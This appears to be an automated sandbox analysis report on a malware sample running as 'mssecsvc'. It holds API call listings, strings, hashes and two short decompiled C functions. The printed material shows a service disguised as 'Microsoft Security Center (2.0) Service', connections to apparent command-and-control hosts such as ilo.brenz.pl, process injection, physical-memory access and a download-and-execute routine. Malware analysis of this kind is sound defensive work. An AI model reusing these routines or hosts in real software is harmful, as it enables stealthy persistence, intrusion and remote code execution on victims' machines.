                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1567941233-504487454
                    • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction ID: 0fd1af5c82e6ac19fee7a4e27b5b7e3d4aaa516ddc9e53bac77035a7f4224d32
                    • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction Fuzzy Hash: BBE1EF71419348BFEB229F748C4ABFA7BACEF41304F00465AEC4A9E081D6F66F059761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                    • GetTickCount.KERNEL32 ref: 00B03D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                    • wsprintfA.USER32 ref: 00B03EF7
                    • CreateThread.KERNEL32(00000000,00000000,00B03691,00000000,00000000), ref: 00B03F40
                    • CloseHandle.KERNEL32(?,9C1F5710), ref: 00B03F49
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 00B03FE9
                    • CloseHandle.KERNEL32(?,00000000), ref: 00B03FF2
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00B03FFF
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 00B042D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 00B042F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 00B0430A
                    Strings
                    • C:,, xrefs: 00B03EF6, 00B03F08
                    • ADVAPI32.DLL, xrefs: 00B03D5E
                    • SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00B03F0C
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B03EDF, 00B03EF4, 00B03F0B, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEvent$CloseHandleThreadwsprintf$AddressCountFileInformationLibraryLoadModuleNameProcResetSleepTickVersionVolumeconnectsocket
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1567941233-504487454
                    • Opcode ID: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction ID: fdec5aee10634f836e63f4d43969f9c132763752476abd8c805dc52b88d9c469
                    • Opcode Fuzzy Hash: d164329b401e47e84a28de3fe606969c9cc020fa4a70ab4836cae6f21abb50e9
                    • Instruction Fuzzy Hash: CFE1EEB1518258BEEB25AF248C4EBEA3FECEF41700F004699E9499E0C2D7F45F4587A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleA.KERNEL32(00000000), ref: 7FEA04BE
                    • GetVersion.KERNEL32 ref: 7FEA0500
                    • VirtualAlloc.KERNEL32(00000000,000077C4,08001000,00000040), ref: 7FEA0528
                    • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AllocCloseModuleVersionVirtual
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 3017432202-1607376603
                    • Opcode ID: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction ID: 79f95d2ebf0118f6fa098ab43f72169bd66920086d18faec8c3dc35e0dca6f1f
                    • Opcode Fuzzy Hash: c1a75dacefef55607d8e276d79dbd6456a9246beeb38c8f7a5af848b843aeecc
                    • Instruction Fuzzy Hash: 30B19D71506349FFEB229F24C849BFA3BA9FF45715F000128EA0A9E181C7F29B45CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CloseHandle.KERNEL32(?), ref: 7FEA05AD
                    • GetModuleHandleA.KERNEL32(7FEA05EC), ref: 7FEA05F2
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,\BaseNamedObjects\itatVt), ref: 7FEA070A
                    • lstrcpyW.KERNEL32(\BaseNamedObjects\itatVt,?), ref: 7FEA072D
                    • lstrcatW.KERNEL32(\BaseNamedObjects\itatVt,\itatVt), ref: 7FEA073B
                    • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 7FEA076B
                    • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 7FEA0786
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 7FEA07C9
                    • Process32First.KERNEL32 ref: 7FEA07DC
                    • Process32Next.KERNEL32 ref: 7FEA07ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA0805
                    • CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FEA0842
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FEA085D
                    • CloseHandle.KERNEL32 ref: 7FEA086C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$Close$CreateOpenProcessProcess32lstrcpy$FirstModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                    • String ID: \BaseNamedObjects\itatVt$\BaseNamedObjects\itatVt$csrs
                    • API String ID: 1545766225-1607376603
                    • Opcode ID: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction ID: 31d302d59c0e1f21b6bd0cc83818483a3c78bcaa99e9f7b56f08f1d198bad350
                    • Opcode Fuzzy Hash: 32195eb0042ebaec25477c261ddf2c99814d954fd4820c083845d242e76727b2
                    • Instruction Fuzzy Hash: BF715D31505205FFEB219F20CC49BBE3BBEEF85715F100068EA0A9E491C7B69F459B59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FEA4057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FEA4066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 7FEA4097
                    • connect.WS2_32(6F6C6902,7FEA3B09,00000010), ref: 7FEA40B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 7FEA40FB
                    • wsprintfA.USER32 ref: 7FEA4179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FEA41B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA41BD
                    • GetTickCount.KERNEL32 ref: 7FEA41F6
                    • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,7FEA6AA2,00000000,00000000), ref: 7FEA428B
                    • GetTickCount.KERNEL32 ref: 7FEA4294
                    • closesocket.WS2_32(6F6C6902), ref: 7FEA42B8
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA42D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 7FEA42F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 7FEA430A
                    Strings
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 7FEA4178, 7FEA4195, 7FEA41DB
                    • \DEVICE\AFD\ENDPOINT, xrefs: 7FEA41DA
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 883794535-3876287451
                    • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction ID: 62042b7e1d70db51705c832b3ce7fc9885254b828fc8a61664828cce23236026
                    • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction Fuzzy Hash: AD71EF75508348BAEB229F3488587EEBFAEEF81314F000608E85A9E1D1C7F66F45D761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 00B04057
                    • gethostbyname.WS2_32(ilo.brenz.pl), ref: 00B04066
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B04097
                    • connect.WS2_32(6F6C6902,00B03B09,00000010), ref: 00B040B1
                    • GetVersionExA.KERNEL32(?,?,00000000), ref: 00B040FB
                    • wsprintfA.USER32 ref: 00B04179
                    • CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 00B041B4
                    • CloseHandle.KERNEL32(?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B041BD
                    • GetTickCount.KERNEL32 ref: 00B041F6
                    • Sleep.KERNEL32(00000064,?,00000000,6F6C6902,00B06AA2,00000000,00000000), ref: 00B0428B
                    • GetTickCount.KERNEL32 ref: 00B04294
                    • closesocket.WS2_32(6F6C6902), ref: 00B042B8
                    • SetEvent.KERNEL32(000002A4,?,00000000), ref: 00B042D6
                    • Sleep.KERNEL32(00007530,?,00000000), ref: 00B042F7
                    • ResetEvent.KERNEL32(000002A4,?,00000000), ref: 00B0430A
                    Strings
                    • \DEVICE\AFD\ENDPOINT, xrefs: 00B041DA
                    • C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe, xrefs: 00B04178, 00B04195, 00B041DB
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountEventSleepTick$CloseCreateHandleResetThreadVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
                    • String ID: C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$\DEVICE\AFD\ENDPOINT
                    • API String ID: 883794535-3876287451
                    • Opcode ID: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction ID: 6b5b5d4355f1bb0b1e9713937209442423c70db457b459b14ad4e39ba85b7383
                    • Opcode Fuzzy Hash: 6b0defe1960dce2cb68afb5d2726ae1425874940fd6c70606eed0c1c35355a33
                    • Instruction Fuzzy Hash: 0F71ECB1618258BAEB319F24885D7AE7FEDEF41310F040688EA5A9E0C1C7F45F85C765
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetSystemTime.KERNEL32(00B07584), ref: 00B0389F
                    • Sleep.KERNEL32(0000EA60), ref: 00B03911
                    • InternetGetConnectedState.WININET(?,00000000), ref: 00B0392A
                    • gethostbyname.WS2_32(0D278125), ref: 00B0396C
                    • socket.WS2_32(00000002,00000001,00000000), ref: 00B03981
                    • ioctlsocket.WS2_32(?,8004667E), ref: 00B0399A
                    • connect.WS2_32(?,?,00000010), ref: 00B039B3
                    • Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00B039C1
                    • closesocket.WS2_32 ref: 00B03A20
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
                    • String ID: uqghqa.com
                    • API String ID: 159131500-3379764604
                    • Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction ID: 32bbd515bac4fb6fae1c9874063fbf14ff13b6d42bcff959ce71312b81d6961f
                    • Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
                    • Instruction Fuzzy Hash: 0D418E31644249BAEB219E248C4EBAD7FDEEF85B10F0440A9F94AEE1C1D7F59F418720
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00407C40() {
                    				char _v260;
                    				void* _t15;
                    				void* _t17;
                    
                    				sprintf( &_v260, "%s -m security", 0x70f760);
                    				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                    				if(_t15 == 0) {
                    					return 0;
                    				} else {
                    					_t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                    					if(_t17 != 0) {
                    						StartServiceA(_t17, 0, 0);
                    						CloseServiceHandle(_t17);
                    					}
                    					CloseServiceHandle(_t15);
                    					return 0;
                    				}
                    			}

                    Instruction addresses: 0x00407c56, 0x00407c6e, 0x00407c72, 0x00407cd3, 0x00407c74, 0x00407ca7, 0x00407cab, 0x00407cb2, 0x00407cb9, 0x00407cb9, 0x00407cbc, 0x00407cc9, 0x00407cc9

                    APIs
                    • sprintf.MSVCRT ref: 00407C56
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                    • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F75FB10,00000000), ref: 00407C9B
                    • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                    • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                    • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                    • API String ID: 3340711343-4063779371
                    • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                    • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                    • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00408090() {
                    				char* _v4;
                    				char* _v8;
                    				intOrPtr _v12;
                    				struct _SERVICE_TABLE_ENTRY _v16;
                    				long _t6;
                    				void* _t19;
                    				void* _t22;
                    
                    				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                    				__imp____p___argc();
                    				_t26 =  *_t6 - 2;
                    				if( *_t6 >= 2) {
                    					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                    					__eflags = _t19;
                    					if(_t19 != 0) {
                    						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
                    						__eflags = _t22;
                    						if(_t22 != 0) {
                    							E00407FA0(_t22, 0x3c);
                    							CloseServiceHandle(_t22);
                    						}
                    						CloseServiceHandle(_t19);
                    					}
                    					_v16 = "mssecsvc2.0";
                    					_v12 = 0x408000;
                    					_v8 = 0;
                    					_v4 = 0;
                    					return StartServiceCtrlDispatcherA( &_v16);
                    				} else {
                    					return E00407F20(_t26);
                    				}
                    			}

                    Instruction addresses: 0x0040809f, 0x004080a5, 0x004080ab, 0x004080ae, 0x004080c9, 0x004080cb, 0x004080cd, 0x004080e8, 0x004080ea, 0x004080ec, 0x004080f1, 0x004080fa, 0x004080fa, 0x004080fd, 0x00408100, 0x00408105, 0x0040810e, 0x00408116, 0x0040811e, 0x00408130, 0x004080b0, 0x004080b8, 0x004080b8

                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                    • __p___argc.MSVCRT ref: 004080A5
                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                    • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F75FB10,00000000,?,004081B2), ref: 004080DC
                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                    • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                    • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                    • String ID: mssecsvc2.0
                    • API String ID: 4274534310-3729025388
                    • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                    • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                    • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$\Device\PhysicalMemory
                    • API String ID: 2985292042-1440550476
                    • Opcode ID: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction ID: 89bc292a39abda77eba81180b1336a71123f95df307fbb064623dea506d6362f
                    • Opcode Fuzzy Hash: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction Fuzzy Hash: 5A817671500208FFEB218F14CC89ABA7BADEF44704F504658ED1A9F295D7F2AF458BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B0344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B03469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B03493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B034A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 00B034B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$\Device\PhysicalMemory
                    • API String ID: 2985292042-1440550476
                    • Opcode ID: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction ID: 5d8f26426e67dff5504208db1d46564283051eaf6ef2413262685fae4bd12b30
                    • Opcode Fuzzy Hash: 9ac2774a33b6e9a16feb6a2e7a11847f6df0cfcf806cd1476616283f6a82205b
                    • Instruction Fuzzy Hash: A1817971500208FFEB248F14CC89AAA3BADFF45B14F504658ED199F291D7F4AF458A64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 7FEA344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 7FEA3469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 7FEA3493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 7FEA34A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 7FEA34B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$ysic
                    • API String ID: 2985292042-2852681185
                    • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction ID: 20dbb16ab5d0e33e58175ecc7424444a29ed84bf4ea1b595fcedbc50fe00d084
                    • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction Fuzzy Hash: D5115B74140608BFEB21CF10CC55FAA7A7DEF88704F50451CEA1A9E290EBF56F188A68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtOpenSection.NTDLL(?,00000006,?,00000018,?,?,00000040,?,?,63697379), ref: 00B0344A
                    • NtQuerySystemInformation.NTDLL(0000000B,?,00000120,00000000), ref: 00B03469
                    • MapViewOfFile.KERNEL32(?,00000006,00000000,?,?,?,00000120,00000000), ref: 00B03493
                    • CloseHandle.KERNEL32(?,00000000,?,00000120,00000000), ref: 00B034A0
                    • UnmapViewOfFile.KERNEL32(?), ref: 00B034B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileView$CloseHandleInformationOpenQuerySectionSystemUnmap
                    • String ID: C:,$ysic
                    • API String ID: 2985292042-2852681185
                    • Opcode ID: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction ID: 559b2d8aa54e4407264a85ef12cda6aceb5e069145916b96a6dc84eacf7b0b12
                    • Opcode Fuzzy Hash: 75692eae59ef229a2f56f45455e385a3c03fd5a3a941212ab90a82f7e6085517
                    • Instruction Fuzzy Hash: 8F116074140608BBEB24CF14CC59F9E3ABCEF88B04F50461CEA199B2D0D7F46F188658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetTempFileNameA.KERNEL32(?,00B027A3,00000000,?), ref: 00B027A8
                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00B027A3,00000000,?), ref: 00B027C3
                    • InternetReadFile.WININET(?,?,00000104), ref: 00B027DD
                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027F3
                    • CloseHandle.KERNEL32(?,00000104,?,00000000,?,00B027A3,00000000,?), ref: 00B027FF
                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00B027A3), ref: 00B02823
                    • InternetCloseHandle.WININET(?), ref: 00B02833
                    • InternetCloseHandle.WININET(00000000), ref: 00B0283A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
                    • String ID:
                    • API String ID: 3452404049-0
                    • Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction ID: 3189656eef598a48bbe5ba90781ea45905783295adf0d12584f0d91f1734b68d
                    • Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
                    • Instruction Fuzzy Hash: 331180B1100606BBFB250F20CC4EFFF7A6DEF84B10F004519FA0699090DBF59E5596A8
                    Uniqueness

